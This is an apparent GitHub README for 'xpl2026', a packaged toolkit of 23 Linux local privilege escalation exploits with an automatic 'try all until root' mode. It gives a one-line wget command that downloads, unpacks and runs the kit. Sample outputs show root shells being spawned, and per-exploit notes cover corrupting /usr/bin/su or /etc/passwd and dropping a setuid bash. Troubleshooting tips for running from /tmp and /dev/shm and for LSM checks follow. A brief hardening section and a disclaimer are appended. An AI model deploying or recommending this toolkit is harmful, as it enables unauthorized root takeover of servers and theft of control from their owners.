VENI | VIDI | VICI
Version: 2.3-universal
Organization: BOB MARLEY LABS
Note : The reason i put this exploit into github is because its Free, Hosting is expensive and my wallet can't handle it anymore, Also the Directory Source-Code is the Original and tweaked Source code of each LPE and it might not be complete / good / great / real, All the source code contained in the Directory might be False-Positive. Use the xpl2026.tgz for Auto-root
- Overview
- Features
- Toolkit Contents
- Quick Start
- Exploit Details
- Usage Examples
- System Requirements
- Troubleshooting
- Advanced Usage
- Detection & Defense
- Legal Notice
- Quick Reference
The xpl2026 toolkit is a comprehensive collection of 23 Linux Local Privilege Escalation (LPE) exploits, designed for penetration testing and security research. All exploits are compiled as fully static binaries for maximum portability and compatibility across different Linux distributions.
- Total Exploits: 23
- Kernel Coverage: 2.6.x - 7.1.x
- Binary Size: 915KB (main toolkit)
- Architecture: x86_64 (universal)
- Compilation: Fully static (no dependencies)
- Fully Static Binaries - No missing library issues
- Multi-Distribution - Works on RHEL, Debian, Ubuntu, CentOS, Fedora, etc.
- Multi-Kernel - Covers kernel versions from 2.6.x to 7.1.x
- LSM-Aware - Detects and adapts to SELinux, AppArmor
- Automatic Detection - Identifies viable exploits for your system
- Requirement Checking - Validates prerequisites before execution
- Smart Filtering - Shows only applicable exploits
- Color-Coded Output - Easy-to-read status indicators
- Interactive Menu - Simple selection interface
- Auto-Exploitation - Run all viable exploits automatically
- Detailed Information - View exploit details and requirements
| # | Exploit Name | CVE | Binary | Size | Kernel Range |
|---|---|---|---|---|---|
| 1 | CopyFail | CVE-2026-31431 | copyfail-go-static | 2.1MB | 5.x - 7.x |
| 2 | DirtyFrag | CVE-2026-43284 | dirtyfrag-static | 877KB | 5.x - 7.x |
| 3 | Fragnesia | CVE-2026-46300 | fragnesia-static | 731KB | 5.x - 7.x |
| 4 | Fragnesia v2 | Enhanced version | fragnesia2-static | 827KB | 5.x - 7.x |
| 5 | DirtyDecrypt | CVE-2026-31635 | dirtydecrypt-static | 838KB | 5.x - 7.x |
| 6 | PinTheft | Page cache exploit | pintheft-static | 834KB | 5.x - 7.x |
| 7 | CIFSwitch | CVE-2026-46243 | cifswitch-static | 1.0MB | 5.x - 7.x |
| 8 | PACKET_EDIT_MEME | CVE-2026-46331 | packet-edit-meme-static | 755KB | 5.18 - 7.1 |
| 9 | IPv6 Frag Escape | 6.12.x container escape | ipv6-frag-escape-static | 855KB | 6.12.0 - 6.12.x |
| 10 | pidfd-race | CVE-2026-46333 | pidfd-race-static | 923KB | 5.x - 7.x |
| 11 | DirtyPipe | CVE-2022-0847 | dirtypipe-static | 806KB | 5.8 - 5.16.11 |
| 12 | Pack2TheRoot | CVE-2026-41651 | pack2theroot-static | 789KB | All (PackageKit) |
| 13 | PwnKit | CVE-2021-4034 | pwnkit-new-static | 778KB | All (pkexec) |
| 14 | OverlayFS | CVE-2021-3493 | overlayfs-static | 826KB | 3.x - 5.11 |
| 15 | OvFS+FUSE | CVE-2023-0386 | ovfs-fuse-static | 826KB | 5.11+ |
| 16 | Polkit D-Bus | CVE-2021-3560 | polkit-dbus-static | 830KB | All (polkit) |
| 17 | Docker Socket | Docker escape | docker-sock-static | 821KB | Container |
| 18 | netfilter OOB | CVE-2021-22555 | netfilter-oob-static | 811KB | 2.6.32 - 5.11 |
| 19 | nft UAF2 | CVE-2022-2586 | nft-uaf2-static | 1.1MB | 5.x - 5.18 |
| 20 | nft UAF | CVE-2024-1086 | nft-uaf-static | 980KB | 5.x - 6.x |
| 21 | DirtyClone | CVE-2026-43503 | dirtyclone-static | 1023KB | 7.1-rc1 - 7.1-rc4 |
| 22 | Bad Epoll | CVE-2026-46242 | bad-epoll-static | 1015KB | lts-6.12.67 (target-specific) |
| 23 | FUSE OOB | CVE-2026-31694 | fuse-oob-static | 31KB | 6.15+ |
xpl2026/
├── xpl2026 # Main toolkit executable (915KB)
├── copyfail-go-static # Exploit binaries
├── dirtyfrag-static
├── fragnesia-static
├── ... (all exploit binaries)
├── CVE-2026-41651/ # Exploit-specific directories
├── CVE-2026-41651-v2/
├── exploit # Legacy exploit (1.1MB)
├── proc_readdir_de # Additional exploit (1.1MB)
├── debian11-xpl2026 # Debian-specific variant
└── cve-2026-41651-almalinux8 # AlmaLinux-specific variant
# Navigate to writable directory
wget https://github.com/khadafigans/LPE-Toolkit/raw/refs/heads/main/xpl2026.tgz --no-check-certificate
tar xzf xpl2026.tgz
rm -rf xpl2026.tgz
# Navigate to xpl2026 directory
cd xpl2026
# Make the Toolkit xpl2026 executable
chmod +x xpl2026
# Run the toolkit
./xpl2026wget https://github.com/khadafigans/LPE-Toolkit/raw/refs/heads/main/xpl2026.tgz --no-check-certificate && tar xzf xpl2026.tgz && rm -rf xpl2026.tgz && cd xpl2026 && chmod +x xpl2026 && ./xpl2026The toolkit will:
- Analyze your system
- Identify viable exploits
- Present an interactive menu
Select option [0] for automatic exploitation:
Your choice: 0The toolkit will try all viable exploits in order until one succeeds.
To run a specific exploit:
Your choice: 9 # Runs PACKET_EDIT_MEMEYour choice: 99 # Shows detailed info about all exploitsType: Page cache corruption
Kernel: 5.x - 7.x
Method: Copy-on-write bypass
Requirements: User namespaces
./copyfail-go-staticDetails:
- Exploits race condition in page cache handling
- Corrupts read-only files in memory
- No disk modification (stealth)
Type: Fragment handling vulnerability
Kernel: 5.x - 7.x
Method: Network buffer fragmentation
Requirements: User namespaces
./dirtyfrag-staticDetails:
- Exploits fragmentation in network stack
- Page cache corruption via network buffers
- Targets
/usr/bin/suor similar SUID binaries
Type: Memory fragmentation exploit
Kernel: 5.x - 7.x
Method: Heap spray + fragmentation
Requirements: User namespaces
./fragnesia-staticDetails:
- Advanced fragmentation technique
- Multiple corruption methods
- High success rate on vulnerable kernels
Fragnesia v2:
- Enhanced version with additional bypasses
- Better compatibility across kernel versions
Type: Crypto subsystem exploit
Kernel: 5.x - 7.x
Method: In-place decryption corruption
Requirements: User namespaces, crypto subsystem
./dirtydecrypt-staticDetails:
- Exploits kernel crypto operations
- Uses in-place decryption to corrupt memory
- Targets page cache of SUID binaries
Type: Page pinning vulnerability
Kernel: 5.x - 7.x
Method: Pin/unpin race condition
Requirements: User namespaces
./pintheft-staticDetails:
- Exploits page pinning mechanism
- Race condition in memory management
- Reliable across multiple kernel versions
Type: CIFS filesystem vulnerability
Kernel: 5.x - 7.x
Method: CIFS upcall exploitation
Requirements: /usr/sbin/cifs.upcall or /sbin/cifs.upcall
./cifswitch-staticDetails:
- Exploits CIFS kernel module
- Requires CIFS utilities present
- Escalates via filesystem operations
Type: Process file descriptor race
Kernel: 5.x - 7.x
Method: Race condition in pidfd handling
Requirements: Modern kernel with pidfd support
./pidfd-race-staticDetails:
- Exploits pidfd_open() system call
- Race condition in process management
- Clean exploitation (no crashes)
Type: Network scheduler exploit
Kernel: 5.18 - 7.1
Method: act_pedit page cache poisoning
Requirements: User namespaces, CAP_NET_ADMIN
# Standard Linux
./packet-edit-meme-static
# Ubuntu with AppArmor
./packet-edit-meme-static --ubuntuDetails:
- Exploits
net/schedtraffic control - Corrupts
/usr/bin/suentry point - Requires kernel >= 5.18 (act_pedit support)
Verified Targets:
- RHEL 10.0 (kernel 6.12.0)
- Debian 13 (kernel 6.12.90)
- Ubuntu 24.04 (kernel 6.17.0) with
--ubuntuflag - Ubuntu 26.04 (AppArmor bypass closed) - NOT supported
Type: Container escape
Kernel: 6.12.0 - 6.12.x (RHEL/CentOS 10)
Method: IPv6 fragmentation + dirty pagetable
Requirements: x86_64, LA57 paging (5-level)
./ipv6-frag-escape-staticDetails:
- Targets RHEL/CentOS 10 containers
- Exploits IPv6 fragmentation handling
- Requires 5-level paging (LA57)
- Container escape capability
Limitations:
- Only works on kernel 6.12.x
- RHEL/CentOS 10 specific
- Requires LA57 CPU feature
Type: Pipe buffer exploitation
Kernel: 5.8 - 5.16.11, 5.10.x - 5.10.102
Method: pipe() + splice() corruption
Requirements: None (universal)
./dirtypipe-staticDetails:
- One of the most reliable exploits
- Works on wide range of kernel versions
- Clean and stable exploitation
- Corrupts read-only files via pipe buffers
Success Rate: Very high on vulnerable kernels
Type: PolicyKit vulnerability
Kernel: All
Method: pkexec environment variable injection
Requirements: /usr/bin/pkexec must be setuid root
./pwnkit-staticDetails:
- Exploits pkexec binary
- Argument processing vulnerability
- Does NOT accept arguments - spawns root shell directly
- Works if pkexec is setuid (mode 4755)
Check if vulnerable:
ls -la /usr/bin/pkexec
# If shows -rwsr-xr-x (setuid bit), it's vulnerableType: Filesystem vulnerability
Kernel: 3.x - 5.11
Method: OverlayFS capability bypass
Requirements: User namespaces, overlayfs support
./overlayfs-staticDetails:
- Exploits OverlayFS mount operations
- Capability confusion in namespace
- Reliable on Ubuntu 18.04 - 20.10
Type: OverlayFS + FUSE exploit
Kernel: 5.11+
Method: FUSE + OverlayFS interaction
Requirements: FUSE support, user namespaces
./ovfs-fuse-staticDetails:
- Combines FUSE and OverlayFS
- More complex but broader compatibility
- Works on newer kernels where CVE-2021-3493 is patched
Type: PolicyKit D-Bus vulnerability
Kernel: All
Method: D-Bus message race condition
Requirements: dbus-send command, polkit service
./polkit-dbus-staticDetails:
- Exploits polkit D-Bus API
- Race condition in message handling
- Requires active D-Bus session
Type: Container escape
Kernel: All (containers)
Method: Docker socket mounting
Requirements: /var/run/docker.sock writable
./docker-sock-staticDetails:
- Escapes from Docker containers
- Requires misconfigured Docker socket
- Mounts host filesystem into container
Type: D-Bus PackageKit race
Kernel: All
Method: PackageKit InstallFiles race to root
Requirements: dbus-send, PackageKit service
./pack2theroot-staticDetails:
- Raw D-Bus client (no libdbus)
- Races PackageKit SIMULATE/NONE flags
- Triggers root-privileged postinst execution
- Drops setuid-root bash at
/var/tmp/.suid_bash
Type: Netfilter out-of-bounds write
Kernel: 2.6.19 - 5.12
Method: ip_tables corruption
./netfilter-oob-staticDetails:
- Classic kernel heap exploitation
- Out-of-bounds write in netfilter subsystem
- Reliable on older kernels
Type: Nftables use-after-free
Kernel: 5.x - 6.x
Method: nftables chain UAF
./nft-uaf2-staticDetails:
- Use-after-free in nftables subsystem
- Targets r00t account creation
- Requires user+net namespace
Type: Netfilter use-after-free
Kernel: 5.x - 6.x
Method: Notselwyn multi-file nftables
./nft-uaf-staticDetails:
- Multi-file nftables UAF exploit
- Includes custom libnftnl/libmnl libraries
- Highly reliable exploitation primitive
Type: Page-cache corruption via ESP-in-UDP
Kernel: 7.1-rc1 - 7.1-rc4
Method: XFRM ESP TEE netfilter target
./dirtyclone-staticDetails:
- ESP-in-UDP TEE corrupts
/etc/passwdpage cache - Self-contained AES-128-CBC implementation
- Creates passwordless root account
- Targets very recent kernels (rc releases)
Type: epoll close-vs-close race UAF
Kernel: lts-6.12.67 (target-specific)
Method: epoll file descriptor race
./bad-epoll-staticDetails:
- Target-specific offsets - default for lts-6.12.67 (kernelCTF)
- Customize
OFF_*andPIVOT*defines for your kernel - Requires
/proc/kallsymsaccess (kptr_restrict=0) - Two epoll pairs + timerfd IRQ widening
- Note: Many distros backported the fix (commit
a6dc643c6931)
Type: FUSE readdir cache overflow
Kernel: 6.15+
Method: fuse_add_dirent_to_cache() OOB write
./fuse-oob-staticDetails:
- Overflows 24 bytes into adjacent page-cache page
- Makes
/etc/passwdroot passwordless - Requires
fusermount3 - Targets very recent kernels (6.15+)
$ ./xpl2026
╔══════════════════════════════════════════════════════════════╗
║ Linux LPE Auto-Exploit Toolkit 2026 v2.0-universal ║
║ BOB MARLEY LABS ║
║ Universal | Static | Multi-Arch | LSM-Aware ║
╚══════════════════════════════════════════════════════════════╝
[*] System Information:
OS: Linux 5.15.0-1089-azure
Kernel: 5.15.0-1089-azure
Architecture: x86_64
User: testuser (uid=1002)
[*] Analyzing vulnerabilities...
╔══════════════════════════════════════════════════════════════╗
║ Available Exploits ║
╚══════════════════════════════════════════════════════════════╝
[1] ✓ CopyFail (CVE-2026-31431)
[2] ✓ DirtyFrag (CVE-2026-43284)
[3] ✓ Fragnesia (CVE-2026-46300)
...
[11] ✗ PwnKit (CVE-2021-4034) [Requirements not met]
...
[*] Found 13 viable exploits for this system$ ./xpl2026
...
Your choice: 0
[*] Auto-exploitation mode enabled
[*] Will try 13 viable exploits in order...
[1/13] Trying: CopyFail (CVE-2026-31431)...
[+] Selected: CopyFail (CVE-2026-31431)
[*] Running exploit...
════════════════════════════════════════════════════════════════
[Exploit output...]$ ./xpl2026
...
Your choice: 9
[+] Selected: PACKET_EDIT_MEME (CVE-2026-46331)
[*] Running exploit...
════════════════════════════════════════════════════════════════
[+] Kernel vulnerable!
[+] Corrupting /usr/bin/su...
[+] Spawning root shell...
# id
uid=0(root) gid=0(root) groups=0(root)# Run exploit directly without toolkit
$ cd xpl2026
$ ./dirtypipe-static
[+] DirtyPipe (CVE-2022-0847)
[+] Checking kernel version...
[+] Kernel 5.10.75 vulnerable!
[+] Corrupting /usr/bin/su...
# id
uid=0(root) gid=0(root) groups=0(root)- Architecture: x86_64 (64-bit Intel/AMD)
- RAM: 512MB
- Disk: 20MB free space
- Kernel: Linux 2.6.x or higher
- Distributions: Ubuntu, Debian, RHEL, CentOS, Fedora, Arch
- User Privileges: Unprivileged user (exploits escalate to root)
- Network: Not required (local exploits only)
Works On:
- Standard Linux distributions
- VPS (DigitalOcean, Linode, Vultr, OVH, Hetzner)
- Dedicated servers
- Physical machines
- Non-cloud VMs (VirtualBox, VMware, KVM)
Limited/No Support:
- Microsoft Azure (kernel hardening)
- Google Cloud Platform (some restrictions)
- AWS EC2 (some restrictions)
- Heavily patched enterprise systems
Problem:
[-] No viable exploits found for this system.
Solutions:
-
Check kernel version:
uname -r
- If < 2.6.x: System too old
- If >= 7.1-rc5: System may be fully patched
-
Check binary files:
ls -lh xpl2026/
- Ensure all exploit binaries are present
-
Check permissions:
chmod +x xpl2026/*.static xpl2026/xpl2026
Problem:
./xpl2026: Permission deniedSolution:
chmod +x xpl2026
./xpl2026Problem:
./exploit: cannot execute binary fileSolutions:
Option 1: Use ld.so loader
/lib64/ld-linux-x86-64.so.2 ./exploitOption 2: Copy to writable location
cp ./exploit /tmp/
cd /tmp
./exploitOption 3: Use /dev/shm
cp ./exploit /dev/shm/
cd /dev/shm
./exploitProblem:
./exploit: version `GLIBC_2.34' not found
Solution:
- Some binaries may require newer GLIBC
- Toolkit is statically compiled to minimize this
- Try different exploits - they have varying requirements
Common Causes:
-
System already patched:
# Check for security updates dpkg -l | grep linux-image
-
Required features disabled:
# Check user namespaces cat /proc/sys/kernel/unprivileged_userns_clone # Should be 1, not 0
-
LSM blocking (SELinux/AppArmor):
# Check SELinux getenforce # Should be Permissive or Disabled # Check AppArmor aa-status # Check for restrictive profiles
-
Cloud provider restrictions:
- Azure blocks XFRM operations
- GCP may block certain syscalls
- AWS varies by instance type
Test all exploits and log results:
#!/bin/bash
# test_all.sh
cd xpl2026
for exploit in *.static; do
echo "Testing: $exploit"
./"$exploit" 2>&1 | tee "../logs/${exploit}.log"
if [ $(id -u) -eq 0 ]; then
echo "SUCCESS: $exploit" >> ../results.txt
exit 0
else
echo "FAILED: $exploit" >> ../results.txt
fi
doneAdd your own exploits to the toolkit:
-
Compile as static binary:
gcc -static -O2 -o myexploit-static myexploit.c strip myexploit-static
-
Copy to xpl2026 directory:
cp myexploit-static xpl2026/
-
Add to xpl2026.c:
add_exploit("myexploit-static", "MyExploit", "CVE-XXXX-XXXXX");
-
Recompile toolkit:
gcc -static -O2 -o xpl2026/xpl2026 xpl2026.c
For automation:
# Run specific exploit non-interactively
cd xpl2026
./dirtypipe-static < /dev/nullTest only exploits for your kernel version:
#!/bin/bash
kernel_ver=$(uname -r | cut -d. -f1,2)
if [[ "$kernel_ver" == "5."* ]]; then
./xpl2026 # Will auto-filter 5.x exploits
elif [[ "$kernel_ver" == "6."* ]]; then
./xpl2026 # Will show 6.x compatible exploits
fi1. Process Monitoring:
# Watch for suspicious namespace creation
auditctl -a always,exit -F arch=b64 -S unshare -k namespace_abuse2. File Integrity:
# Monitor SUID binaries
aide --check /usr/bin/su /usr/bin/sudo3. Capability Monitoring:
# Watch for CAP_NET_ADMIN in user namespaces
auditctl -a always,exit -F arch=b64 -S capset -k capability_abuse4. Network Stack Monitoring:
# Monitor XFRM/IPsec operations
auditctl -w /proc/net/xfrm_stat -p r -k xfrm_access1. Keep System Updated:
# Ubuntu/Debian
apt update && apt upgrade
# RHEL/CentOS
yum update
# Fedora
dnf update2. Disable User Namespaces (if not needed):
echo 0 > /proc/sys/kernel/unprivileged_userns_clone
# Add to /etc/sysctl.conf:
kernel.unprivileged_userns_clone = 03. Enable AppArmor/SELinux:
# AppArmor
aa-enforce /etc/apparmor.d/*
# SELinux
setenforce 14. Harden SUID Binaries:
# Remove unnecessary SUID bits
chmod u-s /usr/bin/newgrp
chmod u-s /usr/bin/chfn
chmod u-s /usr/bin/chsh5. Use Kernel Hardening:
# Enable various protections
sysctl -w kernel.dmesg_restrict=1
sysctl -w kernel.kptr_restrict=2
sysctl -w kernel.unprivileged_bpf_disabled=1For authorized penetration testing, bug bounty programs, and educational purposes only. Unauthorized access to computer systems is illegal under:
- Computer Fraud and Abuse Act (CFAA) - USA
- Computer Misuse Act 1990 - UK
- EU Cybersecurity Act
This toolkit is provided for:
- Authorized penetration testing
- Security research in controlled environments
- CVE verification and testing
- Educational purposes
DO NOT use this toolkit for:
- Unauthorized access to systems
- Malicious purposes
- Attacking systems without explicit permission
- Any illegal activities
USE AT YOUR OWN RISK. Author assumes NO LIABILITY for misuse. By using this tool, you confirm you have explicit authorization to test target systems.
| Your Kernel | Recommended Exploits |
|---|---|
| 2.6.x - 3.x | netfilter OOB, OverlayFS |
| 4.x | OverlayFS, PwnKit, Polkit D-Bus |
| 5.8 - 5.16 | DirtyPipe (highly reliable) |
| 5.18 - 7.0 | PACKET_EDIT_MEME, CopyFail, DirtyFrag |
| 6.12.x | IPv6 Frag Escape (RHEL/CentOS 10) |
| 7.0 - 7.1-rc4 | CopyFail, Fragnesia |
# Basic usage
./xpl2026 # Interactive menu
# Auto-exploit
./xpl2026 << EOF
0
EOF
# Specific exploit
./xpl2026 << EOF
9
EOF
# View information
./xpl2026 << EOF
99
EOF
# Direct execution
./dirtypipe-static # Run exploit directlyBuy me a Coffee:
₿ BTC: 17sbbeTzDMP4aMELVbLW78Rcsj4CDRBiZh
© 2026 khadafigans